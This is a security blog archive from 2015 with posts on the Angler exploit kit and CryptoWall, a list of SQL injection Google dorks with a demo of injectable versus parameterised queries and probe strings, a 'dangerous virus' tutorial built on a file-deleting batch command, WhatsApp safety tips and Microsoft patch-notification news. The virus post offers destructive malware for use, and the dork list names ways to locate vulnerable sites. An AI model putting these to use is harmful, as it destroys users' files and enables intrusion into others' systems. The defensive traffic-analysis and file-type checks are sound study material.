Tuesday, July 7, 2015

Angler Exploit Kit’s Cryptowall 3.0 Campaign Highly Evasive




The SANS Internet Storm Center is reporting that the Angler exploit kit (EK) serving up Cryptowall 3.0 ransomware has been evolving rapidly, altering its URL patterns on an almost daily basis.
“The changes accumulate, and you might not recognize current traffic generated by Angler. After two weeks of vacation, I almost didn’t recognize it,” wrote Brad Duncan.
“Angler pushes different payloads, but we’re still seeing a lot of CryptoWall 3.0 from this EK. We first noticed CryptoWall 3.0 from Angler near the end of May 2015.”
In the first week of the current malware spam campaign the attachment was named my_resume.zip and contained an HTML file named my_resume.svg, which downloaded the Cryptowall 3.0 ransomware from a compromised server; the attackers have since made some adjustments.
“The extracted HTML file names use random numbers, with names like resume4210.html or resume9647.html. Furthermore, the CryptoWall is now hosted on various docs.google.com URLs. If you open one of these HTML files, your browser will generate traffic to a compromised server,” Duncan said last month.
“The return traffic is gzip compressed, so you won’t see it in the TCP stream from Wireshark. Exporting the text from Wireshark shows HTML that points to a shared document from a Google server. Examining the traffic in Wireshark, you’ll see a chain of events leading from the compromised server to docs.google.com.”
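As an added example (not part of the Norse or ISC write-up), here is the gzip step done in code rather than by exporting text from Wireshark: the script takes a raw HTTP response, honours a Content-Encoding: gzip header, and lists the docs.google.com URLs the decoded HTML points at. The response, and the file id inside it, are constructed placeholders, not indicators from the campaign.

```python
import gzip
import re

# Constructed sample HTTP response (not a real capture from the campaign): a
# compromised server answers with gzip-compressed HTML whose only purpose is
# to send the browser on to a docs.google.com URL. The file id is a placeholder.
SAMPLE_HTML = (
    b"<html><head><title>resume</title>"
    b'<meta http-equiv="refresh" content="0;url=https://docs.google.com/uc?id=EXAMPLE_FILE_ID&export=download">'
    b"</head><body>"
    b'<a href="https://docs.google.com/uc?id=EXAMPLE_FILE_ID&export=download">resume</a>'
    b"</body></html>"
)
SAMPLE_BODY = gzip.compress(SAMPLE_HTML)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Encoding: gzip\r\n"
    + b"Content-Length: %d\r\n\r\n" % len(SAMPLE_BODY)
    + SAMPLE_BODY
)


def split_response(raw):
    """Split a raw HTTP response into (status line, header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = lines[0].decode("latin-1")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return status, headers, body


def decoded_body(raw):
    """Return the entity body with gzip Content-Encoding removed.

    A body the server labelled gzip but that does not decompress is returned
    as-is rather than dropped, so nothing is silently lost from the analysis.
    """
    _, headers, body = split_response(raw)
    if headers.get("content-encoding", "").lower() != "gzip":
        return body
    try:
        return gzip.decompress(body)
    except (OSError, EOFError):
        return body


URL_RE = re.compile(rb"""https?://[^\s"'<>]+""")


def extract_urls(html):
    """Every absolute http(s) URL in the markup, de-duplicated and sorted."""
    return sorted({m.decode("latin-1") for m in URL_RE.findall(html)})


def google_doc_links(raw):
    """URLs in the decoded body that hand the victim off to docs.google.com."""
    return [u for u in extract_urls(decoded_body(raw)) if u.startswith("https://docs.google.com/")]


if __name__ == "__main__":
    status, headers, _ = split_response(SAMPLE_RESPONSE)
    print(status, "| content-encoding:", headers.get("content-encoding"))
    for url in google_doc_links(SAMPLE_RESPONSE):
        print("next hop:", url)
```

Run it against the body of a real response (for example one saved from Wireshark's export) and the next hop in the chain falls out without anyone reading compressed bytes; a body that fails to decompress is kept so the mislabelled case is visible rather than discarded.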
The team also detected the Angler exploit kit pushing CryptoWall 3.0 on 2015-05-26, the first time they had seen version 3.0 of CryptoWall used by Angler.
“In each case I’ve documented, the bitcoin address for the ransom payment was 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB. Angler EK is still being used by other groups to send different malware payloads. However, the appearance of CryptoWall 3.0 in Angler since 2015-06-26 using the same bitcoin address indicates this is a separate campaign by a specific actor,” Duncan said.
“The timing of these two campaigns, along with their consistent use of the same bitcoin addresses for the ransom payment, suggest they are related. They may have been initiated by the same actor. This is a significant trend in our current threat landscape.”
As recently as March 2015, researchers saw CryptoWall 3.0 being propagated through spam emails that came with a JavaScript attachment which posed as a resume inside an archive file.
The .JS file connected to two URLs to download files carrying a .JPG extension that were in fact executables. Giving a binary an image extension is an old trick for slipping past filters and poorly designed intrusion detection systems (IDS) that trust the file name or Content-Type instead of inspecting the content.
The .JS file would execute the one.jpg and two.jpg files after a successful download, which were detected as TROJ_CRYPWAL.YOI and TSPY_FAREIT.YOI, respectively.
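The image-extension trick is caught by looking at the bytes rather than the name. The following is an added example, not code from the researchers: it sniffs a download's magic bytes, checks them against what the extension claims, and flags a .jpg that actually starts with an MZ/PE executable header. The one.jpg stand-in is a constructed minimal PE stub, not the real sample.

```python
import os
import struct

# Constructed sample payloads; neither is the real one.jpg / two.jpg from the campaign.
# A minimal MZ/PE stub: "MZ", e_lfanew at offset 0x3C pointing at a "PE\0\0" signature.
FAKE_JPG_EXE = (
    b"MZ\x90\x00" + b"\x00" * 56           # DOS header up to e_lfanew
    + struct.pack("<I", 0x80)              # e_lfanew -> PE header at 0x80
    + b"\x00" * (0x80 - 64)                # padding
    + b"PE\x00\x00" + b"\x00" * 20         # PE signature + start of COFF header
)
REAL_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32   # JFIF header

# Leading bytes of the formats that matter here; extend as needed.
MAGIC = {
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "zip": (b"PK\x03\x04",),
    "mz": (b"MZ",),
}
IMAGE_EXTENSIONS = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".gif": "gif"}
# Content that carries code or other files rather than pixels.
PAYLOAD_VERDICTS = {"pe": "suspicious-executable", "mz": "suspicious-executable", "zip": "suspicious-archive"}


def is_pe(data):
    """True if an MZ file carries a valid PE signature at e_lfanew."""
    if len(data) < 0x40 or not data.startswith(b"MZ"):
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def sniff_type(data):
    """Identify content by its magic bytes, ignoring the file name entirely."""
    for name, signatures in MAGIC.items():
        if any(data.startswith(sig) for sig in signatures):
            if name == "mz" and is_pe(data):
                return "pe"
            return name
    return "unknown"


def classify_download(filename, data):
    """Compare what the extension claims with what the bytes actually are."""
    ext = os.path.splitext(filename.lower())[1]
    claimed = IMAGE_EXTENSIONS.get(ext)
    actual = sniff_type(data)
    if claimed is None:
        verdict = "unknown-extension"
    elif actual == claimed:
        verdict = "ok"
    else:
        verdict = PAYLOAD_VERDICTS.get(actual, "mismatch")
    return {"file": filename, "claimed": claimed, "actual": actual, "verdict": verdict}


if __name__ == "__main__":
    for name, blob in (("one.jpg", FAKE_JPG_EXE), ("photo.jpg", REAL_JPG)):
        print(classify_download(name, blob))
```

The same check belongs at the proxy or mail gateway: an image download whose first bytes are an MZ header is worth blocking or at least alerting on, whatever the URL called it.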

The Internet Crime Complaint Center (IC3) – a partnership between the Federal Bureau of Investigation (FBI) and the National White Collar Crime Center (NW3C) – reported recently that 992 U.S. victims of the Cryptowall ransomware campaign have incurred losses in excess of $18 million between April of 2014 and June of 2015.
“Recent IC3 reporting identifies CryptoWall as the most current and significant ransomware threat targeting U.S. individuals and businesses. CryptoWall and its variants have been used actively to target U.S. victims since April 2014,” the IC3 advisory stated.
“The financial impact to victims goes beyond the ransom fee itself, which is typically between $200 and $10,000. Many victims incur additional costs associated with network mitigation, network countermeasures, loss of productivity, legal fees, IT services, and/or the purchase of credit monitoring services for employees or customers.”
Source : http://darkmatters.norsecorp.com/2015/07/06/angler-exploit-kits-cryptowall-3-0-campaign-highly-evasive/

Monday, May 4, 2015

Google Dorks for SQL Injection


Below is a list of URL fragments commonly used as Google dorks for SQL injection. Each one is a page name plus a query parameter that is typically passed straight into a database query; prefixed with inurl: (for example inurl:"about.php?cartID="), it finds pages built that way, which are then tested by hand. A search hit is a candidate only: matching the URL pattern says nothing about whether the parameter is actually injectable.
        about.php?cartID=
        accinfo.php?cartId=
        acclogin.php?cartID=
        add.php?bookid=
        add_cart.php?num=
        addcart.php?
        addItem.php
        add-to-cart.php?ID=
        addToCart.php?idProduct=
        addtomylist.php?ProdId=
        adminEditProductFields.php?intProdID=
        advSearch_h.php?idCategory=
        affiliate.php?ID=
        affiliate-agreement.cfm?storeid=
        affiliates.php?id=
        ancillary.php?ID=
        archive.php?id=
        article.php?id=
        phpx?PageID
        basket.php?id=
        Book.php?bookID=
        book_list.php?bookid=
        book_view.php?bookid=
        BookDetails.php?ID=
        browse.php?catid=
        browse_item_details.php
        Browse_Item_Details.php?Store_Id=
        buy.php?
        buy.php?bookid=
        bycategory.php?id=
        cardinfo.php?card=
        cart.php?action=
        cart.php?cart_id=
        cart.php?id=
        cart_additem.php?id=
        cart_validate.php?id=
        cartadd.php?id=
        cat.php?iCat=
        catalog.php
        catalog.php?CatalogID=
        catalog_item.php?ID=
        catalog_main.php?catid=
        category.php
        category.php?catid=
        category_list.php?id=
        categorydisplay.php?catid=
        checkout.php?cartid=
        checkout.php?UserID=
        checkout_confirmed.php?order_id=
        checkout1.php?cartid=
        comersus_listCategoriesAndProducts.php?idCategory=
        comersus_optEmailToFriendForm.php?idProduct=
        comersus_optReviewReadExec.php?idProduct=
        comersus_viewItem.php?idProduct=
        comments_form.php?ID=
        contact.php?cartId=
        content.php?id=
        customerService.php?****ID1=
        default.php?catID=
        description.php?bookid=
        details.php?BookID=
        details.php?Press_Release_ID=
        details.php?Product_ID=
        details.php?Service_ID=
        display_item.php?id=
        displayproducts.php
        downloadTrial.php?intProdID=
        emailproduct.php?itemid=
        emailToFriend.php?idProduct=
        events.php?ID=
        faq.php?cartID=
        faq_list.php?id=
        faqs.php?id=
        feedback.php?title=
        freedownload.php?bookid=
        fullDisplay.php?item=
        getbook.php?bookid=
        GetItems.php?itemid=
        giftDetail.php?id=
        help.php?CartId=
        home.php?id=
        index.php?cart=
        index.php?cartID=
        index.php?ID=
        info.php?ID=
        item.php?eid=
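An added example (not from the author of the list above) showing how these patterns are used and why they matter. build_dork turns a fragment into the inurl: query that finds matching pages; the sqlite3 stand-in models the PHP code behind such a page, once with the query-string value pasted into the SQL text (the pattern the dorks hunt for) and once with it bound as a parameter (the fix). The table, rows and function names are assumptions made for the demonstration.

```python
import sqlite3

# A few patterns from the list above, used to show how a dork is built.
DORK_PATTERNS = ["about.php?cartID=", "cart.php?id=", "details.php?Product_ID="]


def build_dork(pattern, site=None):
    """Turn a 'page.php?param=' fragment into the inurl: query that finds it."""
    query = f'inurl:"{pattern}"'
    if site:
        query += f" site:{site}"
    return query


def make_db():
    """Constructed in-memory stand-in for the shop database behind cart.php?id=."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE carts (id INTEGER PRIMARY KEY, owner TEXT, total REAL)")
    con.executemany(
        "INSERT INTO carts VALUES (?, ?, ?)",
        [(1, "alice", 10.0), (2, "bob", 25.5), (3, "carol", 99.0)],
    )
    return con


def lookup_vulnerable(con, cart_id):
    """The pattern the dorks hunt for: the raw query-string value is pasted
    into the SQL text, as in PHP's "... WHERE id=" . $_GET['id']."""
    sql = "SELECT id, owner FROM carts WHERE id=" + cart_id
    return con.execute(sql).fetchall()


def lookup_safe(con, cart_id):
    """The fix: validate the type, then bind the value as a parameter so the
    database never interprets it as SQL."""
    try:
        cart_id = int(cart_id)
    except ValueError:
        return []
    return con.execute("SELECT id, owner FROM carts WHERE id=?", (cart_id,)).fetchall()


def probe(con, value):
    """What a tester does with a dork hit: push a probe value through the
    parameter and see whether the page errors out or changes its answer."""
    try:
        rows = lookup_vulnerable(con, value)
    except sqlite3.OperationalError as exc:
        return ("db-error", str(exc))
    return ("rows", len(rows))


if __name__ == "__main__":
    for pattern in DORK_PATTERNS:
        print(build_dork(pattern))
    db = make_db()
    print("normal:       ", probe(db, "2"))              # one row
    print("quote probe:  ", probe(db, "2'"))             # database error leaks out
    print("boolean probe:", probe(db, "2 OR 1=1"))       # every cart comes back
    print("safe lookup:  ", lookup_safe(db, "2 OR 1=1"))  # rejected, nothing returned
```

probe shows the two signals a tester looks for on a dork hit: a stray quote producing a database error, and a boolean condition changing the result set. With the parameterised version both probes are inert, which is the whole reason these page names stop being interesting once the code behind them binds its parameters.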

Thursday, April 23, 2015

Learn To Make Dangerous Virus In A Minute


In this post I will show you how to make a simple but destructive computer "virus" using nothing more than a batch file. No software is required; Notepad is enough. Being a plain-text script with no binary payload, it is unlikely to be flagged by signature-based antivirus, although no scan results are given here and the claim that no antivirus detects it should not be relied on.


What will this virus do ?
It is written in batch. When run, the del command tries to delete every file in the root of the C: drive. Note that del without /s does not recurse into subdirectories, and files that Windows currently has open cannot be deleted, so "deletes the C drive completely" overstates it; the damage to anything stored directly in C:\ is real all the same. If you want to learn more about batch programming, see my post Learn Batch Programming.


How to Make the virus ?


   1. Open Notepad and copy below code into it.


       @Echo off
       Del C:\ *.* |y


   2. Save this file as virus.bat (the name can be anything, but the extension must be .bat).
   3. Running this file attempts to delete the files in the root of the C: drive. Note that, as written, the trailing |y is a pipe into a command named y, which does not exist; del prompts for confirmation on a *.* wildcard, and the pipe was evidently meant to answer that prompt.


Warning: Do not run this on your own computer; it will delete files from your C: drive. I will not be responsible for any damage done to your computer.


Saturday, February 7, 2015

Safety tips to follow while using WhatsApp.

1. Never send private information such as bank account details, PINs or passwords over WhatsApp.
2. Never accept files or start downloads from messages sent by strangers or unknown numbers.
3. Never respond to suspicious messages from unknown numbers.
4. WhatsApp as a service will never contact you through a WhatsApp message.
5. Never trust any message that claims to come from WhatsApp and demands a payment for the service.
6. Some scams offer to connect your PC to WhatsApp so you can send messages from a desktop. The only official way to do this is WhatsApp Web (web.whatsapp.com, launched in January 2015); any other "WhatsApp for PC" app or paid desktop connector is a scam or malware.
7. Keep automatic media downloads disabled so that you always know what is being downloaded.
8. Avoid using WhatsApp on open Wi-Fi networks; these are hunting grounds for malware authors and data sniffers.
9. Keep an antivirus solution installed and updated on your mobile device.
10. Lock WhatsApp behind a secure password or PIN (via your device's screen lock or an app-lock feature), so a lost or borrowed phone does not expose your chats.
11. Remember to log out of WhatsApp Web when you are done.
12. Review WhatsApp's privacy options (who can see your last seen, profile photo and status) and set them deliberately.
Source: OoPpSs Group and WhatsApp

Sunday, January 11, 2015

Microsoft Kills Public Patch Tuesday Advance Notifications; Now for Paid Members Only





For more than ten years Microsoft has publicly previewed its Patch Tuesday releases a few days in advance, but from next month's second Tuesday onwards, if you want to know which security bulletins Microsoft is going to issue, you will have to pay for it.

UPDATE ALERTS FOR PAID CUSTOMERS ONLY

Yes, Microsoft has decided to retire the public form of its Advance Notification Service (ANS) and will no longer post a blog entry previewing what is coming on Patch Tuesday.
Microsoft is facing fierce criticism from industry experts for making the advance bulletin information available only to customers who pay a premium.

Note: only the advance notifications are now paid-for; the security updates and patches themselves remain free.

NO MORE "OUT-OF-BAND" PUBLIC SECURITY ALERTS

In a post on the Microsoft Security Response Center (MSRC) blog, Chris Betz, senior director of the MSRC, said:
"more and more customers today are seeking to cut through the clutter and obtain security information tailored to their organizations. Rather than using ANS to help plan security update deployments, customers are increasingly turning to Microsoft Update and security update management tools such as Windows Server Update Service to help organize and prioritize deployment. Customers are also moving to cloud-based systems, which provide continuous updating."
The change in Microsoft's Advanced Notification Service (ANS) also applies to the occasional alerts that Microsoft issued when it gave customers a heads-up about an impending emergency patch i.e. public alerts for "out-of-band” updates.

WHAT-THE-HACK [FREE ADVANCE ALERTS]

Within a couple of hours of Microsoft's announcement we were getting WhatsApp messages and emails from readers and colleagues, none of them happy about the decision. But there is a way to get the advance notification without being a premium Microsoft customer.
A Microsoft spokesperson told ZDNet that customers who receive ANS information are not required to sign an NDA. That means any premium customer is free to republish the advance notices as soon as they receive them, so the information can still end up public.

MICROSOFT'S myBulletins DASHBOARD

Microsoft points administrators who are not premium customers to myBulletins, an online service that lets you build a customized list of the security bulletins for the Microsoft products you run and track which patches still need to be applied.

Unfortunately, myBulletins does not send notifications; you must sign in to the service with your Microsoft account to see the bulletins that apply to you.